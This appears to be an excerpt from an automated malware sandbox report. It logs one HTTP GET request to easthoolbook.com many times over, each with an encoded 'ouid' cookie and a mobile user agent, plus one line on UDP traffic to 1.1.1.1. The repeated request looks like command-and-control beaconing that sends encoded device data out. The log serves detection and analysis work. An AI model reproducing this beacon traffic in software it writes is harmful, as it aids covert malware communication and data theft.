Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
